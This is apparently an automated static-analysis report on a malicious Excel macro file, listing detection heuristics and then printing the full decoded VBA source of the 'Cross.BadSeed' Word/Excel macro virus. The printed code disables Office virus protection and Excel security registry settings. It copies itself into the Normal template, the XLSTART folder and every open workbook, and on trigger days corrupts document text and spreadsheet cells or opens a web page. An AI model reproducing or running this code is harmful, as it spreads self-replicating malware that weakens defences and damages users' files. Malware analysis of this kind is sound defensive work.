Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 318e60cd16c69498…

MALICIOUS

Office (OLE)

29.5 KB Created: 1998-12-08 08:08:44 Authoring application: Microsoft Excel First seen: 2015-10-13
MD5: bff469bbde705cc467bfb56a333bd2b0 SHA-1: 1d638fd523609fe5b03d81508c8874e7a642499e SHA-256: 318e60cd16c6949882143f025e880958f8f98c0e8321a0f9a1eb5c4683c753fa
322 Risk Score

Heuristics 7

  • ClamAV: Doc.Trojan.Hopper-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hopper-7
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        Options.VirusProtection = False
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
            Set xlApp = CreateObject("Excel.Application")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
            Set WordObj = GetObject(, "Word.Application")
  • VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script
                xlApp.Workbooks.Add.SaveAs xlApp.Application.StartupPath & "\Book1."
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.geocities.com/SiliconValley/Horizon/9386/actxtest.htm� In document text (OLE body)
    • http://www.geocities.com/SiliconValley/Horizon/9386/actxtest.htmIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6397 bytes
SHA-256: fcfe587336906b8f0ee1adc7151fc22f3ee65937d733730af42b6d04827ea4f0
Detection
ClamAV: Doc.Trojan.Hopper-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
'Cross.BadSeed v0.4 /1nternal
Private InRoutine As Boolean
Private Sub Document_Close()
    On Error Resume Next
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    Set NT = NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule
    If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
        NT.DeleteLines 1, NT.CountOfLines
        NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
        Set xlApp = CreateObject("Excel.Application")
        If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
            System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
            xlApp.Workbooks.Add.SaveAs xlApp.Application.StartupPath & "\Book1."
            xlApp.Workbooks("Book1.").VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
            xlApp.Workbooks("Book1.").Close SaveChanges:=True
        End If
        xlApp.Application.Quit
    End If
    If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
        AD.DeleteLines 1, AD.CountOfLines
        AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
    End If
    Select Case Day(Now)
        Case 15 And (Int((10 * Rnd) + 1) = 1)
            ActiveDocument.FollowHyperlink Address:="http://www.geocities.com/SiliconValley/Horizon/9386/actxtest.htm", NewWindow:=True, AddHistory:=False
        Case 1 And (Int((10 * Rnd) + 1) = 1)
            For i = 1 To ActiveDocument.Characters.Count
                If ActiveDocument.Characters(i).Text = "I" Then ActiveDocument.Characters(i).Text = "1"
            Next
        Case 5 And (Int((10 * Rnd) + 1) = 1)
            For i = 1 To ActiveDocument.Words.Count
                If ActiveDocument.Words(i).Text = "not" Then ActiveDocument.Words(i).Text = ""
            Next
        Case 10 And (Int((15 * Rnd) + 1) = 1)
            With Assistant.NewBalloon
                .Heading = "Cross.BadSeed v0.4"
                .Text = "Programmer:        1nternal" + Chr(13) + "Class Infection:    VicodenES" + Chr(13) + "ActiveX Concept: 1nternal" + Chr(13) + "Book1. Concept:  VicodenES" + Chr(13) + Chr(13) + "1nternal also wishes to thank all contributors and supporters which have made Cross.BadSeed possible."
                .Show
            End With
        Case 20 And (Int((5 * Rnd) + 1) = 1)
            Application.StatusBar = "Cross.BadSeed v0.4 /1nternal"
    End Select
End Sub
Private Sub Workbook_Deactivate()
    On Error Resume Next
    If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" And InRoutine <> True Then
        InRoutine = True
        Set WordObj = GetObject(, "Word.Application")
        If WordObj = "" Then
            Set WordObj = CreateObject("Word.Application")
            Quit = True
        End If
        Set NT = WordObj.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
        If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
            WordObj.Options.SaveNormalPrompt = False
            NT.DeleteLines 1, NT.CountOfLines
            NT.InsertLines 1, "Public Sub DisableAV()" + Chr(13) + Chr(10) + "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"", ""Options6"") = """"" + Chr(13) + Chr(10) + "System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel"", ""Options6"") = """"" + Chr(13) + Chr(10) + "End Sub"
            WordObj.Run "Normal.ThisDocument.DisableAV"
            NT.DeleteLines 1, NT.CountOfLines
            NT.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
        End If
        Set NT = Nothing
        If Quit = True Then WordObj.Application.Quit
        Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
        Workbooks("Book1.").Close SaveChanges:=True
    End If
    For i = 1 To Workbooks.Count
        If Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, 1) <> "'<!--1nternal-->" Then
            Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
        End If
    Next
    If ActiveWorkbook.Name <> "Book1." Then
        Select Case Day(Now)
            Case 1 And Int((Rnd * 10) + 1) = 1
                For i = 1 To 10
                    ActiveSheet.Cells(Int(Rnd * 100), Int(Rnd * 100)).AddComment "Cross.BadSeed v0.4"
                Next
            Case 10 And Int((Rnd * 3) + 1) = 1
                For f = 1 To 5
                    CellCol = Int(Rnd * 15) + 2
                    For i = 1 To 30
                        Row1 = Int(Rnd * 200) + 10
                        Row2 = Int(Rnd * 200) + 10
                        TempVal = ActiveSheet.Cells(Row1, CellCol)
                        ActiveSheet.Cells(Row1, CellCol) = ActiveSheet.Cells(Row2, CellCol)
                        ActiveSheet.Cells(Row2, CellCol) = TempVal
                    Next
                Next
            Case 15
                Author = "1nternal"
            Case 20 And Int((Rnd * 5) + 1) = 1
                Application.StatusBar = "Cross.BadSeed v0.4 /1nternal"
        End Select
    End If
End Sub

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True